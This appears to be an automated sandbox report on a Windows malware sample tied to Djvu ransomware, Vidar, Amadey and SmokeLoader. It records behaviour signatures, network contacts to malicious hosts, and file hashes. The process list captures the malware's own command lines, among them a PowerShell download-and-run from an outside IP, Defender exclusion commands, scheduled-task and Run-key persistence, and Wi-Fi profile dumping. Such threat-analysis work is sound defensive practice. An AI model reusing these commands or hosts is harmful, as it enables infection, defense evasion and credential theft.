Analysis Overview
SHA256
1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50
Threat Level: Known bad
The file 1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50 was found to be: Known bad.
Malicious Activity Summary
DcRat
Amadey
Detected Djvu ransomware
Djvu Ransomware
SmokeLoader
Detect Vidar Stealer
Vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Blocklisted process makes network request
Downloads MZ/PE file
Modifies file permissions
Reads user/profile data of web browsers
Identifies Wine through registry keys
Checks BIOS information in registry
Deletes itself
Loads dropped DLL
Reads WinSCP keys stored on the system
Reads local data of messenger clients
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Looks up external IP address via web service
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
Program crash
Unsigned PE
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Checks SCSI registry key(s)
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Creates scheduled task(s)
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-03-15 00:59
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-15 00:59
Reported
2024-03-15 01:04
Platform
win7-20240221-en
Max time kernel
303s
Max time network
270s
Command Line
Signatures
Amadey
DcRat
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\190491e8-0589-47c4-8568-05aca41dbeb1\\4912.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\4912.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe | N/A |
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
SmokeLoader
Vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\5AC2.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\5AC2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\5AC2.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\5AC2.exe | N/A |
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads WinSCP keys stored on the system
Reads local data of messenger clients
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\190491e8-0589-47c4-8568-05aca41dbeb1\\4912.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\4912.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Windows\CurrentVersion\Run\blyat.dll = "rundll32 C:\\Users\\Admin\\AppData\\Local\\Temp\\1000005011\\blyat.dll, Main" | C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5AC2.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Dctooux.job | C:\Users\Admin\AppData\Local\Temp\61F4.exe | N/A |
| File created | C:\Windows\Tasks\explorgu.job | C:\Users\Admin\AppData\Local\Temp\5AC2.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\DFB7.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Roaming\igrvrtd | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Roaming\igrvrtd | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Roaming\igrvrtd | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\igrvrtd | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\61F4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5AC2.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe
"C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {6B9E4C8B-2F6A-46C1-BECC-EDF750FC0F99} S-1-5-21-2461186416-2307104501-1787948496-1000:MGILJUBR\Admin:Interactive:[1]
C:\Users\Admin\AppData\Roaming\igrvrtd
C:\Users\Admin\AppData\Roaming\igrvrtd
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\F49C.bat" "
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\4912.exe
C:\Users\Admin\AppData\Local\Temp\4912.exe
C:\Users\Admin\AppData\Local\Temp\4912.exe
C:\Users\Admin\AppData\Local\Temp\4912.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\190491e8-0589-47c4-8568-05aca41dbeb1" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\AppData\Local\Temp\4912.exe
"C:\Users\Admin\AppData\Local\Temp\4912.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\4912.exe
"C:\Users\Admin\AppData\Local\Temp\4912.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe
"C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe"
C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe
"C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe"
C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build3.exe
"C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2128 -s 1404
C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build3.exe
"C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build3.exe"
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Users\Admin\AppData\Local\Temp\DFB7.exe
C:\Users\Admin\AppData\Local\Temp\DFB7.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2684 -s 124
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\E9F5.bat" "
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\7D2.exe
C:\Users\Admin\AppData\Local\Temp\7D2.exe
C:\Users\Admin\AppData\Local\Temp\5AC2.exe
C:\Users\Admin\AppData\Local\Temp\5AC2.exe
C:\Users\Admin\AppData\Local\Temp\61F4.exe
C:\Users\Admin\AppData\Local\Temp\61F4.exe
C:\Users\Admin\AppData\Local\Temp\70C4.exe
C:\Users\Admin\AppData\Local\Temp\70C4.exe
C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
"C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData"
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\461186416230_Desktop.zip' -CompressionLevel Optimal
C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
"C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 208
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command "Invoke-WebRequest -Uri 'http://193.222.96.225/server/website2014523652458952/blue/Gcode_Secure/Gcode.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\WmiPrvSE.exe'; Start-Process 'C:\Users\Admin\AppData\Roaming\WmiPrvSE.exe'"
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | trad-einmyus.com | udp |
| RU | 81.94.159.197:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | sdfjhuz.com | udp |
| JM | 63.143.98.185:80 | sdfjhuz.com | tcp |
| US | 8.8.8.8:53 | sportessentia.home.pl | udp |
| PL | 79.96.138.166:443 | sportessentia.home.pl | tcp |
| PL | 79.96.138.166:443 | sportessentia.home.pl | tcp |
| US | 8.8.8.8:53 | m2reg.ulm.ac.id | udp |
| ID | 103.23.232.80:80 | m2reg.ulm.ac.id | tcp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| US | 104.21.65.24:443 | api.2ip.ua | tcp |
| US | 104.21.65.24:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | sajdfue.com | udp |
| JM | 63.143.98.185:80 | sdfjhuz.com | tcp |
| CO | 190.249.149.134:80 | sajdfue.com | tcp |
| CO | 190.249.149.134:80 | sajdfue.com | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.154.77:443 | steamcommunity.com | tcp |
| DE | 5.75.208.156:80 | 5.75.208.156 | tcp |
| RU | 81.94.159.197:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | valowaves.com | udp |
| US | 172.67.192.62:443 | valowaves.com | tcp |
| US | 8.8.8.8:53 | nessotechbd.com | udp |
| US | 192.185.16.114:443 | nessotechbd.com | tcp |
| US | 192.185.16.114:443 | nessotechbd.com | tcp |
| US | 8.8.8.8:53 | dham2fjg7wsuiqovkuaqkfc42rhfbctvzf4filsx5kq7iqvvd5n2tuad.onion.ly | udp |
| US | 209.141.39.59:443 | dham2fjg7wsuiqovkuaqkfc42rhfbctvzf4filsx5kq7iqvvd5n2tuad.onion.ly | tcp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.169.78:443 | drive.google.com | tcp |
| NL | 195.20.16.82:443 | | tcp |
| NL | 195.20.16.82:443 | | tcp |
| US | 8.8.8.8:53 | lknusantararaya.com | udp |
| ID | 103.147.154.49:443 | lknusantararaya.com | tcp |
| ID | 103.147.154.49:443 | lknusantararaya.com | tcp |
| US | 8.8.8.8:53 | streamingplay.site | udp |
| BR | 45.152.46.72:443 | streamingplay.site | tcp |
| BR | 45.152.46.72:443 | streamingplay.site | tcp |
| US | 8.8.8.8:53 | www.upload.ee | udp |
| FR | 51.91.30.159:443 | www.upload.ee | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| DE | 140.82.121.4:443 | github.com | tcp |
| RU | 185.215.113.45:80 | 185.215.113.45 | tcp |
| US | 8.8.8.8:53 | topgamecheats.dev | udp |
| BG | 93.123.39.96:443 | topgamecheats.dev | tcp |
| NL | 193.222.96.225:80 | 193.222.96.225 | tcp |
| BG | 93.123.39.96:80 | topgamecheats.dev | tcp |
| BG | 93.123.39.96:80 | topgamecheats.dev | tcp |
| BG | 93.123.39.96:80 | topgamecheats.dev | tcp |
| BG | 93.123.39.96:80 | topgamecheats.dev | tcp |
| BG | 93.123.39.96:80 | topgamecheats.dev | tcp |
| BG | 93.123.39.96:80 | topgamecheats.dev | tcp |
Files
memory/2584-1-0x0000000000290000-0x0000000000390000-memory.dmp
memory/2584-2-0x00000000001B0000-0x00000000001BB000-memory.dmp
memory/2584-3-0x0000000000400000-0x0000000000720000-memory.dmp
memory/1196-4-0x0000000002980000-0x0000000002996000-memory.dmp
memory/2584-5-0x0000000000400000-0x0000000000720000-memory.dmp
C:\Users\Admin\AppData\Roaming\igrvrtd
| MD5 | 15fbdb93344afb1b663ace05ee0d40c1 |
| SHA1 | 03cc060e4c749212cdbce07aeed5623e4f94c27e |
| SHA256 | 1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50 |
| SHA512 | 60f19cc94ff20a2675f906bdd4166df49336018d7362e03386e3dc2bf886ee35e31f4d0955738bea39a0943bea03661cb00405ff03736e9c2349f24b028bcabb |
memory/2468-14-0x0000000000880000-0x0000000000980000-memory.dmp
memory/2468-15-0x0000000000400000-0x0000000000720000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\F49C.bat
| MD5 | 55cc761bf3429324e5a0095cab002113 |
| SHA1 | 2cc1ef4542a4e92d4158ab3978425d517fafd16d |
| SHA256 | d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a |
| SHA512 | 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155 |
memory/1196-25-0x0000000003910000-0x0000000003926000-memory.dmp
memory/2468-26-0x0000000000400000-0x0000000000720000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4912.exe
| MD5 | f772938618715239d925c7b7943c5582 |
| SHA1 | 0312bdaca177849dea6df975a70e768ee56cccf4 |
| SHA256 | a2c5938f8e1aeebff52a3077b1bf3ddb8666ea539886846fb64db6c012c8cd33 |
| SHA512 | 6a259c1ced90aded5dc99173831cff6314287af90e9181cbc701221f93f2407714e991ee3881c4e79409081179c1a53e67e5a756f793bfd40fa9f76693a31213 |
memory/2572-36-0x0000000000290000-0x0000000000322000-memory.dmp
memory/2572-37-0x0000000000290000-0x0000000000322000-memory.dmp
memory/2572-38-0x0000000001D60000-0x0000000001E7B000-memory.dmp
memory/2456-41-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2456-43-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2456-46-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2456-47-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2456-70-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2340-71-0x00000000002C0000-0x0000000000352000-memory.dmp
memory/2340-86-0x00000000002C0000-0x0000000000352000-memory.dmp
memory/2312-88-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2312-92-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | d67fa48cf6cf5f1818b732ea24db1d6e |
| SHA1 | 44858909775b98c384307149a53b231f084427f6 |
| SHA256 | 1dd5acc0e95a7e0a6eea0ce7e4ab2665c928db84a241f4006a06791343b84d27 |
| SHA512 | c89132c4ac4a3e34e37ba33d98347af7c6a0394eceafb043cfd99e5d41d68575287cc537831a3f42924c975f7716aa0c531c6f619fac2df1c17daca658b926a6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | b642c2ba174da9d65a8cdc4048780293 |
| SHA1 | aa40992c96b49e57eab03a7f57983d3388197e32 |
| SHA256 | b6b36f5f2d84838c75521393d4f9f936bcef87fa9bd804503401eb0b8517f5ab |
| SHA512 | 742661c298f05cbb1b2f52489149cdecfbad1f9c2a8364295e5f9e7525cd3e012fe482d8f066a72beceb684d9d77ebc3cbb599018cfb4764b9d6ef9eb3199054 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | a50b02a961c31efcbe1cf881d0e436b0 |
| SHA1 | 82e575657203fc8d19c05ead8b68b947195c9360 |
| SHA256 | cbc4e81175c4eb7b25521c4ba4a9666a685370c85e3cef407e0ddd70c1f9f9ab |
| SHA512 | f08d01ddfab3f18a746997f6f80a803e18e14b0a87e51146fb2709645d077cde69f8dbdf138efaab79117317c38f8f9a88698dc89a3cfe2163850f5826235fc6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 8202a1cd02e7d69597995cabbe881a12 |
| SHA1 | 8858d9d934b7aa9330ee73de6c476acf19929ff6 |
| SHA256 | 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5 |
| SHA512 | 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2c177018f8a90adbd895ed636688cc98 |
| SHA1 | 3f4771a0fdc807467399e931e8ddd21d566074a1 |
| SHA256 | 796721074a88f491348d0f88c05e58cf6eea4b3cdadc64d243a16208dd1fdc7d |
| SHA512 | 128ff1a89a4892b605d0daf8cd88635a26df021048404e345d5c5f4a18910b9908b2a241cc3544b115d2107e804780dd621ae5a8da6f1113af3951a78ae3a472 |
C:\Users\Admin\AppData\Local\Temp\CabA43B.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
memory/2312-107-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2312-108-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2312-110-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2312-114-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2312-117-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2312-116-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2312-118-0x0000000000400000-0x0000000000537000-memory.dmp
\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe
| MD5 | 47704f454af8641dac1af2e2768d7881 |
| SHA1 | e3341bfdec84f69684aecde18cab2864519c7728 |
| SHA256 | a6a9375dd6e3b285bc6d65536a151a47dd136aced8180492f5ed6a391edf0d64 |
| SHA512 | 9aea598ee30342a88fedf5eca2b104e8c5587cd284bd43229581b04497c60e6a71e5392a171a5dfbe88a2e41269434922e21c3f7f9682e2ea10b27b104606b25 |
memory/568-135-0x0000000000260000-0x0000000000360000-memory.dmp
memory/568-136-0x0000000000730000-0x0000000000761000-memory.dmp
memory/2128-134-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2128-138-0x0000000000400000-0x0000000000644000-memory.dmp
memory/2128-141-0x0000000000400000-0x0000000000644000-memory.dmp
memory/2128-142-0x0000000000400000-0x0000000000644000-memory.dmp
\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build3.exe
| MD5 | 41b883a061c95e9b9cb17d4ca50de770 |
| SHA1 | 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad |
